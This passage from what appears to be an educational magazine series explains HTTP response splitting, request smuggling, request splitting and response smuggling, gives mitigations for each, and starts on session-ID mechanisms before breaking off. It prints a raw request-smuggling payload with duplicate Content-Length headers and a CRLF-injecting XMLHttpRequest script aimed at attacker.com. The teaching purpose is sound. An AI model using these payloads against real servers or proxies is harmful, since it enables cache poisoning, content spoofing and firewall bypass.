In cross-user attacks, the second response sent by the web server may be misinterpreted as a response to a different request, possibly one made by another user sharing the same TCP connection with the sever. In this way, request from one user is served to another.
————————————–End box (cross user attacks) ———————————
To perform cache poisoning, the attacker will simply add a ‘Last-Modified’ header in the injected part (to cache the malicious web page as long as the Last-Modified header is sent with a date ahead of the current date). Moreover, adding ‘Cache-Control: no-cache’ and/or ‘Pragma: no-cache’ in the injected part will cause non-cached websites to be added to the cache.
Time for security
This vulnerability in web applications may lead to defacement through web-cache poisoning, and to cross-site scripting vulnerabilities, but the following methods can help curb it:
The best way to avoid HTTP splitting vulnerabilities is to parse all user input for CR/LF i.e \r\n, %0d%0a, or any other forms of encoding these, or other such malicious characters, before using them in any kind of HTTP headers.
Properly escape the URI in every place where it is output, like the HTTP Location Header, so that even if CR/LF is present, it will not be parsed by the browser.
The myth that using SSL saves one from the attack is not true; it still leaves browser cache and post-SSL termination uncovered. Don’t rely on SSL to save you from this attack.
For more attack vectors and solutions to them, don’t forget to visit the resources at the end of this article.
HTTP request smuggling attack
HTTP request smuggling attacks are aimed at distributed systems that handle HTTP requests (especially those that contain embedded requests) in different ways. Such differences can be exploited in servers or applications that pass HTTP requests along to another server directly, like proxies, cache servers, or firewalls. If the intermediate server interprets the request one way (thus seeing a particular request), and the downstream server interprets it another way (thus seeing a different particular request), then responses will not be associated with the correct requests. Hence, the intermediary device, which should protect the network from dangerous HTTP requests, treats the malicious request as data, while the server can interpret it as a proper request.
This dissociation could cause cache poisoning or cross-site scripting (XSS), with the result that the user could be shown inappropriate content. Alternatively, it could cause firewall protection to be bypassed, or cause disruption of response-request tracking and sequencing, thus increasing the vulnerability of your server to additional, possibly even more serious, attacks.
Why does it work? Request smuggling exploits the way in which HTTP end-points parse and interpret the protocol, and counts on the lax enforcement of the HTTP specification (RFC 2616). RFC 2616 specifies that there should be one, and only one, Content-Length header. But, by using multiple Content-Length headers, it is possible to confuse proxies and bypass some web application firewalls, because of the way in which they interpret the HTTP headers. This is partly because RFC 2616 does not specify the behaviour of an endpoint when receiving multiple HTTP headers, and partly because end-points have always been more forgiving of clients that take liberties with the HTTP protocol than they should be. So some end-points ignore the first, or the second, and then use the data included in Content-Length to parse the request. This can be used to direct proxies to treat requests as data, and vice-versa, which can confuse end-points, and trick them into executing malicious requests hidden inside legitimate requests.
Attack scenario
This particular case depicts the web-cache-poisoning attack using via request smuggling. It involves sending a set of HTTP requests to a system comprising of a web server (www.example.com) and a caching-proxy server. Here, the attacker’s goal is to make the cache server cache the content of www.example.com/resource_denied.html instead of www.example.com/welcome.html.
Note: For a successful request-smuggling attack, there should be an XSS vulnerability in the web application.
The attack involves sending an HTTP POST request with multiple Content-Length headers. The attacker sends this to the proxy server:
POST http://www.example.com/some.html HTTP/1.1
Host: www.example.com
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 0
Content-Length: 39
GET /resource_denied.html HTTP/1.1
Blah: GET http://www.example.com/welcome.html HTTP/1.1
Host: www.example.com
Connection: Keep-Alive
The proxy will see the header section of the first (POST) request. It then uses the last Content-Length header (39 bytes) to process the body of the message; it reads the body (up till 39 bytes) and sends the web server the original request:
POST http://www.example.com/some.html HTTP/1.1
Host: www.example.com
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 0
Content-Length: 39
GET /resource_denied.html HTTP/1.1
Blah:
The web server sees the first request (i.e. POST), uses the first Content-Length header, and interprets the first request as:
POST http://www.example.com/some.html HTTP/1.1
Host: www.example.com
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 0
Content-Length: 39
Note the empty body (Content-Length is 0 bytes). The web server answers this request, and then it has another partial request (given below), awaiting completion in the queue:
GET /resource_denied.html HTTP/1.1
Blah:
The proxy now receives the web server’s first response, forwards it to the attacker, and proceeds to read the attacker’s second request, which will be:
GET http://www.example.com/welcome.html HTTP/1.1
Host: www.example.com
Connection: Keep-Alive
Now, it is quite clear that the web server’s response for this request will be cached by the proxy as the response for the URI http://www.example.com/welcome.html. The proxy forwards this request to the web server. It is appended to the end of the web server’s partial request, which is now completed, as shown:
GET /resource_denied.html HTTP/1.1
Blah: GET http://www.example.com/welcome.html HTTP/1.1
Host: www.example.com
Connection: Keep-Alive
The web server finally has a full second request from this client, which it can now process. It interprets the request stream as containing an HTTP request for http://www.example.com/resource_denied.html. The ‘Blah’ HTTP header has no meaning according to the HTTP RFC, and thus is ignored by the web server. The net result is that the content of the page http://www.example.com/resource_denied.html is returned in response to a (poisoned) request for http://www.example.com/welcome.html. Now, till the cache entry expires, the cache server will deliver cached copies of resource_denied.html to victims who request welcome.html.
Figure 3 : Request smuggling (web cache poisoning)
Figure 3 : Request smuggling (web cache poisoning)
This example is a case of partial web-cache poisoning (see Figure 3), because full control over the cached content is not given to the attacker. Moreover, he/she has no direct control over the returned HTTP headers, and more importantly, the attacker has to use an existing (and cacheable) page in the target web site for his/her content (in the above case, resource_denied.html). However, besides this, the attacker can also bypass firewalls/IDS/IPS and steal authentication credentials—of course, that’s not a big deal now. To explore more on request smuggling, don’t forget to check the resources at the end of the article.
Time for security
Install web application firewalls, which protect against HRS attacks. A few firewalls are still vulnerable to HRS attacks; check with the firewall vendor if their product protects against HRS or not.
Apply strong session-management techniques. Terminate the session after each request.
Turn off TCP connection sharing on the intermediate devices. TCP connection sharing improves performance, but allows attackers to smuggle HTTP requests.
Turn on non-cache for all pages. For more details refer to http://www.web-caching.com/.
HTTP request splitting attack
This attack forces the victim’s browser to send multiple HTTP requests instead of a single request. Two mechanisms have been exploited to date, for this attack: the XmlHttpRequest object (XHR for short) and the HTTP digest authentication mechanism. For this attack to work, the victim must use a forward HTTP proxy. In order to split the HTTP request, CRLFs are injected into the request.
—————————————————————————————-
XmlHttpRequest is a JavaScript object that allows client-side JavaScript code to send almost raw HTTP requests to the origin host, and to access the response body in raw form. As such, XmlHttpRequest is a core component of AJAX.
———————————————————————————————
Attack scenario
Consider a web application having an XSS vulnerability, and there is web proxy between the victim and the web server. Exploiting the XmlHttpRequest object, the attacker fools the victim into clicking the following malicious script:
var x = new ActiveXObject(”Microsoft.XMLHTTP”);
//var x = new XMLHttpRequest();
x.open(“GET\thttp://www.attacker.com/page1.html\tHTTP/1.0\r\n Host:\twww.attacker.com\r\n Proxy-Connection:\tKeep-Alive\r\n\r\nGET”,”http://www.attacker.com/page2.html”,false); x.send();
//x.send(“”);
window.open(“http://www.example.com/index.html”);
Note : The above code will work for Internet Exploder; the modifications required for Mozilla are commented so you can just uncomment them as required.
When the victim’s browser executes the above script, it sends a single HTTP request, whose target is www.attacker.com. Thus, it does not break the same-origin policy, and hence is allowed. However, the forward proxy server will receive the following request:
GET\thttp://www.attacker.com/page1.html\tHTTP/1.0
Host:\twww.attacker.com
Proxy-Connection:\tKeep-Alive
GET http://www.attacker.com/page2.html HTTP/1.0
Host: www.attacker.com
……
……
Content-Type: text/html
Connection: Keep-Alive
Hence, it will respond with two HTTP responses. The first response (http://www.attacker.com/page1.html) will be consumed by the XHR object itself, and the second (http://www.attacker.com/page2.html) will wait in the browser’s response queue until the browser requests http://www.example.com/index.html (because window.open() will now execute). Now, the browser will match the response from http://www.attacker.com/page2.html to the request for the URL http://www.target.com/index.html, and will display the attacker’s page in the window, with that URL!!
Important Note : In the above attack, we have used horizontal tabs (\t) instead of simple spaces, because IE doesn’t allow spaces in the method parameter of x.open(). The reason we have used HTTP/1.0 is that HTTP/1.1 strictly requires using only space, while HTTP/1.0 doesn’t have such restrictions.
The malicious script executed by the victim’s browser sends only one request, but the proxy receives two HTTP requests (potentially to different origin domains), hence the proxy responds with two different HTTP responses.
Time for security
Though HTTP request splitting is a very rare attack, still, the following recommendations should be carried out:
It is good if site owners use SSL for protection.
Eliminating XSS entirely will definitely help a lot.
There are also suggestions for blocking HTTP/1.0 requests to the web server. Though this will work, on the other hand, it will also block the entry of major search engines’ web crawlers and spiders, because those mostly use HTTP/1.0.
Follow the security tips given for the previous attacks (especially parsing all the user input for CRLFs).
HTTP response smuggling attack
This is a very rarely occurring attack, in which an attacker smuggles two HTTP responses from a server to a client, through an intermediary HTTP device that allows a single response from the server. To do this, it takes advantage of inconsistent or incorrect interpretations of the HTTP protocol by various applications. For example, it might use different block-terminating characters (CR or LF alone), adding duplicate header fields that browsers interpret as belonging to separate responses, or other techniques. Consequences of this attack can include response-splitting, cross-site scripting, apparent defacement of targeted sites, cache poisoning, or similar actions.
The most use of this attack is in evading anti-HTTP-response-splitting (anti-HRS) mechanisms; for this to happen, the targeted server must allow the attacker to insert content that will appear in the server’s response. HTTP response smuggling makes use of HTTP request smuggling-like techniques to exploit the discrepancies between what an anti-HRS mechanism (or a proxy server) would consider to be the HTTP response stream, and the response stream as parsed by a proxy server (or a browser). So, while an anti-HRS mechanism may consider a particular response stream harmless (a single HTTP response), a proxy/browser may still parse it as two HTTP responses, and hence be susceptible to all the outcomes of the original HTTP-response-splitting technique (in the first use case), or be susceptible to page spoofing (in the second case).
For example, some anti-HRS mechanisms in use by some application engines forbid the application from inserting a header containing CR+LF to the response. Yet, an attacker can force the application to insert a header containing LFs only, or CRs only, thereby circumventing the defence mechanism. Some proxy servers may still treat CR (only) as a header (and response) separator, and as such, the combination of web server and proxy server will still be vulnerable to an attack that may poison the proxy’s cache.
Now, since this attack has a lot more dependencies (which is the reason for its rarity) I request you to visit the resources below to get a good hold on this. As for security measures, employ strict adherence to interpretations of HTTP messages wherever possible. (Remember: no CRs and no LFs). Moreover, encoding header information provided by user input (so that user-supplied content is not interpreted by intermediaries) is also a good way to handle the attack. Finally, reject any non RFC-compliant response.
All the examples and attack scenarios explained above are just for educational purposes. I once again stress that neither I nor LFY aim to teach readers how to attack servers. Rather, the attack techniques are meant to give you knowledge that you need to protect your own infrastructure. We will deal with other dangerous attacks on web applications and Apache in the next article. Always remember: Know hacking, but no hacking.
vi.
In this part of the series, we are going to concentrate on attacks on session management. Application-level attacks on the session is about obtaining or manipulating the session ID without any prior information to the client and the Web server. The sole aim of the attacker here is to somehow gain access to a valid session between the victim and the Web server.
Before explaining the principles behind attacks on sessions, let’s have a look at exactly what a session is, and why we need it.
HTTP is a stateless protocol. Every time the client asks for a page, or for a graphic within a page, a new connection is set up between the client’s browser and the Web server. There is no relationship at all between one connection and another, because there is no state. The second connection does not know anything about what took place during the first connection.
Though this statelessness of HTTP is perfectly acceptable in some cases (for example, when using the Web to search for information), it is not appropriate for a Web application where context needs to be maintained from page to page. For example, on an e-commerce site, on the page where users enter their credit card number to complete the purchase transaction, the code needs to know what items they have chosen on the previous pages, in order to compute the total amount. The e-commerce site needs a mechanism that identifies a “session”, a virtual “established connection” between a browser and a Web server, to pass a context from page to page.
Figure 1: Normal client-server communication using session ID
Figure 1: Normal client-server communication using session ID
Technically, this is done as shown in Figure 1. When the browser connects to the Web server for the first time, the user has not been authenticated yet. The Web server asks for credentials, and generates a unique identifier (the session ID). The server can associate a context with each session ID, storing any kind of information in that context. The generated session ID is sent back to the browser. For every subsequent call to the server, the browser sends the session ID to the server. The server can then use the context associated with the transmitted session ID, and “remember” data from page to page.
It is important to understand here that to identify a session, the session is given a session ID. This ID is sent between client and server for those HTTP requests that belong to that session. The Web application sessions are usually implemented in two ways:
Client-side session management: In client-side session implementation, the bulk of authorisation and identity information for the user is stored client-side, in a cookie. The client sends the information found in its cookie (including the session ID) to let the server know who is sending these requests.
Server-side session management: In contrast, the server-side implementation stores the bulk of authorisation and identity information in a back-end database on the server. The session ID is used to index the user’s information in that database, so the server can access the appropriate information upon receiving requests from the client.
Session identifier mechanisms
To identify and maintain valid sessions, the following three mechanisms are used:
Unique identifier embedded in URL.
Unique identifier in hidden form field.
Unique identifier in cookies.
We will now discuss each one of them, and their advantages and disadvantages.
Embedded in the URL
Such identifiers are received by the Web application through HTTP GET requests when the client clicks on a link embedded in a page. Say, for example, this could be like: http://www.bank.com/account.php?sessionid=IE60012219.
However, Web-based invitation services typically use unique session IDs embedded in URLs.
Advantages:
This method is immune to CSRF attacks that are leveraged through external websites.
This method is also independent of browser settings. Passing parameters along with URLs is a feature that is always supported by all browsers. This is one of the reasons why URL parameters are a fall-back solution to cookies.
Disadvantages:
The session ID in the URL is visible. It appears in the HTTP referrer header sent to other websites when the client follows an external link from within the application. Moreover, it also appears in the log files of proxy and Web servers, as well as in the browser history and bookmarks.
There is also a risk of clients copying the URL (including the identifier), and mailing it to others, while they are still logged in.
All the client’s links within the Web application must include the session ID and either the application must take care of it or it must be handled by the application’s framework.
In hidden form fields
Typically, session ID information is embedded within the form as a hidden field, and submitted with the HTTP POST command. For example: